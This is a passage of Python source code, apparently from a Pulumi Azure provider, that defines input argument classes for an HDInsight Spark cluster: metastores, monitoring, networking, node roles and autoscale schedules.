    @property
    @pulumi.getter
    def hive(self) -> Optional[pulumi.Input['SparkClusterMetastoresHiveArgs']]:
        """A `hive` block as defined below."""
        return pulumi.get(self, "hive")

    @hive.setter
    def hive(self, value: Optional[pulumi.Input['SparkClusterMetastoresHiveArgs']]):
        pulumi.set(self, "hive", value)

    @property
    @pulumi.getter
    def oozie(self) -> Optional[pulumi.Input['SparkClusterMetastoresOozieArgs']]:
        """An `oozie` block as defined below."""
        return pulumi.get(self, "oozie")

    @oozie.setter
    def oozie(self, value: Optional[pulumi.Input['SparkClusterMetastoresOozieArgs']]):
        pulumi.set(self, "oozie", value)
@pulumi.input_type
class SparkClusterMetastoresAmbariArgs:
    # External Ambari metastore settings for an HDInsight Spark Cluster.
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        :param pulumi.Input[str] database_name: The external Ambari metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "database_name", database_name)
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "server", server)
        pulumi.set(__self__, "username", username)
    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL database. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "database_name")
    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)
    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")
    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)
    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """
        The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "server")
    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)
    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")
    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class SparkClusterMetastoresHiveArgs:
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        External Hive metastore settings for an HDInsight Spark Cluster.

        :param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        # All four connection fields are required inputs.
        for key, arg in (("database_name", database_name),
                         ("password", password),
                         ("server", server),
                         ("username", username)):
            pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL database. Changing this forces a new resource to be created."""
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """The fully-qualified domain name (FQDN) of the SQL server hosting the external Hive metastore. Changing this forces a new resource to be created."""
        return pulumi.get(self, "server")

    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class SparkClusterMetastoresOozieArgs:
    def __init__(__self__, *,
                 database_name: pulumi.Input[str],
                 password: pulumi.Input[str],
                 server: pulumi.Input[str],
                 username: pulumi.Input[str]):
        """
        External Oozie metastore settings for an HDInsight Spark Cluster.

        :param pulumi.Input[str] database_name: The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
        :param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
        :param pulumi.Input[str] username: The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
        """
        # All four connection fields are required inputs.
        for key, arg in (("database_name", database_name),
                         ("password", password),
                         ("server", server),
                         ("username", username)):
            pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="databaseName")
    def database_name(self) -> pulumi.Input[str]:
        """The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created."""
        return pulumi.get(self, "database_name")

    @database_name.setter
    def database_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "database_name", value)

    @property
    @pulumi.getter
    def password(self) -> pulumi.Input[str]:
        """The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: pulumi.Input[str]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter
    def server(self) -> pulumi.Input[str]:
        """The fully-qualified domain name (FQDN) of the SQL server hosting the external Oozie metastore. Changing this forces a new resource to be created."""
        return pulumi.get(self, "server")

    @server.setter
    def server(self, value: pulumi.Input[str]):
        pulumi.set(self, "server", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)
@pulumi.input_type
class SparkClusterMonitorArgs:
    def __init__(__self__, *,
                 log_analytics_workspace_id: pulumi.Input[str],
                 primary_key: pulumi.Input[str]):
        """
        Azure Monitor / OMS settings for an HDInsight Spark Cluster.

        :param pulumi.Input[str] log_analytics_workspace_id: The Operations Management Suite (OMS) workspace ID.
        :param pulumi.Input[str] primary_key: The Operations Management Suite (OMS) workspace key.
        """
        # Both fields are required inputs.
        for key, arg in (("log_analytics_workspace_id", log_analytics_workspace_id),
                         ("primary_key", primary_key)):
            pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="logAnalyticsWorkspaceId")
    def log_analytics_workspace_id(self) -> pulumi.Input[str]:
        """The Operations Management Suite (OMS) workspace ID."""
        return pulumi.get(self, "log_analytics_workspace_id")

    @log_analytics_workspace_id.setter
    def log_analytics_workspace_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "log_analytics_workspace_id", value)

    @property
    @pulumi.getter(name="primaryKey")
    def primary_key(self) -> pulumi.Input[str]:
        """The Operations Management Suite (OMS) workspace key."""
        return pulumi.get(self, "primary_key")

    @primary_key.setter
    def primary_key(self, value: pulumi.Input[str]):
        pulumi.set(self, "primary_key", value)
@pulumi.input_type
class SparkClusterNetworkArgs:
    def __init__(__self__, *,
                 connection_direction: Optional[pulumi.Input[str]] = None,
                 private_link_enabled: Optional[pulumi.Input[bool]] = None):
        """
        Network settings for an HDInsight Spark Cluster.

        :param pulumi.Input[str] connection_direction: Direction of the resource provider connection. Possible values include `Inbound` or `Outbound`. Defaults to `Inbound`. Changing this forces a new resource to be created.
        :param pulumi.Input[bool] private_link_enabled: Is the private link enabled? Possible values include `True` or `False`. Defaults to `False`. Changing this forces a new resource to be created.
        """
        # Both settings are optional; only supplied values are recorded.
        for key, arg in (("connection_direction", connection_direction),
                         ("private_link_enabled", private_link_enabled)):
            if arg is not None:
                pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="connectionDirection")
    def connection_direction(self) -> Optional[pulumi.Input[str]]:
        """Direction of the resource provider connection (`Inbound` or `Outbound`; default `Inbound`). Changing this forces a new resource to be created."""
        return pulumi.get(self, "connection_direction")

    @connection_direction.setter
    def connection_direction(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "connection_direction", value)

    @property
    @pulumi.getter(name="privateLinkEnabled")
    def private_link_enabled(self) -> Optional[pulumi.Input[bool]]:
        """Is the private link enabled? (`True` or `False`; default `False`). Changing this forces a new resource to be created."""
        return pulumi.get(self, "private_link_enabled")

    @private_link_enabled.setter
    def private_link_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "private_link_enabled", value)
@pulumi.input_type
class SparkClusterRolesArgs:
    def __init__(__self__, *,
                 head_node: pulumi.Input['SparkClusterRolesHeadNodeArgs'],
                 worker_node: pulumi.Input['SparkClusterRolesWorkerNodeArgs'],
                 zookeeper_node: pulumi.Input['SparkClusterRolesZookeeperNodeArgs']):
        """
        Node-role layout for an HDInsight Spark Cluster.

        :param pulumi.Input['SparkClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
        :param pulumi.Input['SparkClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
        :param pulumi.Input['SparkClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
        """
        # All three node roles are required inputs.
        for key, arg in (("head_node", head_node),
                         ("worker_node", worker_node),
                         ("zookeeper_node", zookeeper_node)):
            pulumi.set(__self__, key, arg)

    @property
    @pulumi.getter(name="headNode")
    def head_node(self) -> pulumi.Input['SparkClusterRolesHeadNodeArgs']:
        """A `head_node` block as defined above."""
        return pulumi.get(self, "head_node")

    @head_node.setter
    def head_node(self, value: pulumi.Input['SparkClusterRolesHeadNodeArgs']):
        pulumi.set(self, "head_node", value)

    @property
    @pulumi.getter(name="workerNode")
    def worker_node(self) -> pulumi.Input['SparkClusterRolesWorkerNodeArgs']:
        """A `worker_node` block as defined below."""
        return pulumi.get(self, "worker_node")

    @worker_node.setter
    def worker_node(self, value: pulumi.Input['SparkClusterRolesWorkerNodeArgs']):
        pulumi.set(self, "worker_node", value)

    @property
    @pulumi.getter(name="zookeeperNode")
    def zookeeper_node(self) -> pulumi.Input['SparkClusterRolesZookeeperNodeArgs']:
        """A `zookeeper_node` block as defined below."""
        return pulumi.get(self, "zookeeper_node")

    @zookeeper_node.setter
    def zookeeper_node(self, value: pulumi.Input['SparkClusterRolesZookeeperNodeArgs']):
        pulumi.set(self, "zookeeper_node", value)
@pulumi.input_type
class SparkClusterRolesHeadNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Head Node configuration for an HDInsight Spark Cluster.

        :param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Persist only the optional settings the caller actually supplied.
        for key, val in (("password", password),
                         ("ssh_keys", ssh_keys),
                         ("subnet_id", subnet_id),
                         ("virtual_network_id", virtual_network_id)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class SparkClusterRolesWorkerNodeArgs:
    def __init__(__self__, *,
                 target_instance_count: pulumi.Input[int],
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 autoscale: Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleArgs']] = None,
                 min_instance_count: Optional[pulumi.Input[int]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Worker Node configuration for an HDInsight Spark Cluster.

        :param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
        :param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleArgs'] autoscale: A `autoscale` block as defined below.
        :param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "target_instance_count", target_instance_count)
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        if autoscale is not None:
            pulumi.set(__self__, "autoscale", autoscale)
        if min_instance_count is not None:
            # Deprecated field: warn once, but keep storing it for backward compatibility.
            # (Previously this condition was tested twice in a row; the two guards are merged.)
            warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
            pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
            pulumi.set(__self__, "min_instance_count", min_instance_count)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if ssh_keys is not None:
            pulumi.set(__self__, "ssh_keys", ssh_keys)
        if subnet_id is not None:
            pulumi.set(__self__, "subnet_id", subnet_id)
        if virtual_network_id is not None:
            pulumi.set(__self__, "virtual_network_id", virtual_network_id)

    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """
        The number of instances which should be run for the Worker Nodes.
        """
        return pulumi.get(self, "target_instance_count")

    @target_instance_count.setter
    def target_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", value)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """
        The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """
        The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def autoscale(self) -> Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleArgs']]:
        """
        A `autoscale` block as defined below.
        """
        return pulumi.get(self, "autoscale")

    @autoscale.setter
    def autoscale(self, value: Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleArgs']]):
        pulumi.set(self, "autoscale", value)

    @property
    @pulumi.getter(name="minInstanceCount")
    def min_instance_count(self) -> Optional[pulumi.Input[int]]:
        """
        The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "min_instance_count")

    @min_instance_count.setter
    def min_instance_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_instance_count", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class SparkClusterRolesWorkerNodeAutoscaleArgs:
    def __init__(__self__, *,
                 capacity: Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleCapacityArgs']] = None,
                 recurrence: Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceArgs']] = None):
        """
        Autoscale settings for the Worker Nodes of an HDInsight Spark Cluster.

        :param pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleCapacityArgs'] capacity: A `capacity` block as defined below.
        :param pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceArgs'] recurrence: A `recurrence` block as defined below.
        """
        # Both settings are optional; record only what was given.
        for key, val in (("capacity", capacity), ("recurrence", recurrence)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def capacity(self) -> Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleCapacityArgs']]:
        """A `capacity` block as defined below."""
        return pulumi.get(self, "capacity")

    @capacity.setter
    def capacity(self, value: Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleCapacityArgs']]):
        pulumi.set(self, "capacity", value)

    @property
    @pulumi.getter
    def recurrence(self) -> Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]:
        """A `recurrence` block as defined below."""
        return pulumi.get(self, "recurrence")

    @recurrence.setter
    def recurrence(self, value: Optional[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceArgs']]):
        pulumi.set(self, "recurrence", value)
@pulumi.input_type
class SparkClusterRolesWorkerNodeAutoscaleCapacityArgs:
    def __init__(__self__, *,
                 max_instance_count: pulumi.Input[int],
                 min_instance_count: pulumi.Input[int]):
        """
        Capacity bounds for Worker Node autoscaling.

        :param pulumi.Input[int] max_instance_count: The maximum number of worker nodes to autoscale to based on the cluster's activity.
        :param pulumi.Input[int] min_instance_count: The minimum number of worker nodes to autoscale to based on the cluster's activity.
        """
        for key, val in (("max_instance_count", max_instance_count),
                         ("min_instance_count", min_instance_count)):
            pulumi.set(__self__, key, val)

    @property
    @pulumi.getter(name="maxInstanceCount")
    def max_instance_count(self) -> pulumi.Input[int]:
        """The maximum number of worker nodes to autoscale to based on the cluster's activity."""
        return pulumi.get(self, "max_instance_count")

    @max_instance_count.setter
    def max_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "max_instance_count", value)

    @property
    @pulumi.getter(name="minInstanceCount")
    def min_instance_count(self) -> pulumi.Input[int]:
        """The minimum number of worker nodes to autoscale to based on the cluster's activity."""
        return pulumi.get(self, "min_instance_count")

    @min_instance_count.setter
    def min_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "min_instance_count", value)
@pulumi.input_type
class SparkClusterRolesWorkerNodeAutoscaleRecurrenceArgs:
    def __init__(__self__, *,
                 schedules: pulumi.Input[Sequence[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]],
                 timezone: pulumi.Input[str]):
        """
        Recurring autoscale schedule for the Worker Nodes.

        :param pulumi.Input[Sequence[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]] schedules: A list of `schedule` blocks as defined below.
        :param pulumi.Input[str] timezone: The time zone for the autoscale schedule times.
        """
        for key, val in (("schedules", schedules), ("timezone", timezone)):
            pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def schedules(self) -> pulumi.Input[Sequence[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]:
        """A list of `schedule` blocks as defined below."""
        return pulumi.get(self, "schedules")

    @schedules.setter
    def schedules(self, value: pulumi.Input[Sequence[pulumi.Input['SparkClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs']]]):
        pulumi.set(self, "schedules", value)

    @property
    @pulumi.getter
    def timezone(self) -> pulumi.Input[str]:
        """The time zone for the autoscale schedule times."""
        return pulumi.get(self, "timezone")

    @timezone.setter
    def timezone(self, value: pulumi.Input[str]):
        pulumi.set(self, "timezone", value)
@pulumi.input_type
class SparkClusterRolesWorkerNodeAutoscaleRecurrenceScheduleArgs:
    def __init__(__self__, *,
                 days: pulumi.Input[Sequence[pulumi.Input[str]]],
                 target_instance_count: pulumi.Input[int],
                 time: pulumi.Input[str]):
        """
        One entry of the recurring Worker Node autoscale schedule.

        :param pulumi.Input[Sequence[pulumi.Input[str]]] days: The days of the week to perform autoscale.
        :param pulumi.Input[int] target_instance_count: The number of worker nodes to autoscale at the specified time.
        :param pulumi.Input[str] time: The time of day to perform the autoscale in 24hour format.
        """
        for key, val in (("days", days),
                         ("target_instance_count", target_instance_count),
                         ("time", time)):
            pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def days(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """The days of the week to perform autoscale."""
        return pulumi.get(self, "days")

    @days.setter
    def days(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "days", value)

    @property
    @pulumi.getter(name="targetInstanceCount")
    def target_instance_count(self) -> pulumi.Input[int]:
        """The number of worker nodes to autoscale at the specified time."""
        return pulumi.get(self, "target_instance_count")

    @target_instance_count.setter
    def target_instance_count(self, value: pulumi.Input[int]):
        pulumi.set(self, "target_instance_count", value)

    @property
    @pulumi.getter
    def time(self) -> pulumi.Input[str]:
        """The time of day to perform the autoscale in 24hour format."""
        return pulumi.get(self, "time")

    @time.setter
    def time(self, value: pulumi.Input[str]):
        pulumi.set(self, "time", value)
@pulumi.input_type
class SparkClusterRolesZookeeperNodeArgs:
    def __init__(__self__, *,
                 username: pulumi.Input[str],
                 vm_size: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        Zookeeper Node configuration for an HDInsight Spark Cluster.

        :param pulumi.Input[str] username: The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Persist only the optional settings the caller actually supplied.
        for key, val in (("password", password),
                         ("ssh_keys", ssh_keys),
                         ("subnet_id", subnet_id),
                         ("virtual_network_id", virtual_network_id)):
            if val is not None:
                pulumi.set(__self__, key, val)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, value: pulumi.Input[str]):
        pulumi.set(self, "username", value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class SparkClusterSecurityProfileArgs:
    def __init__(__self__, *,
                 aadds_resource_id: pulumi.Input[str],
                 domain_name: pulumi.Input[str],
                 domain_user_password: pulumi.Input[str],
                 domain_username: pulumi.Input[str],
                 ldaps_urls: pulumi.Input[Sequence[pulumi.Input[str]]],
                 msi_resource_id: pulumi.Input[str],
                 cluster_users_group_dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
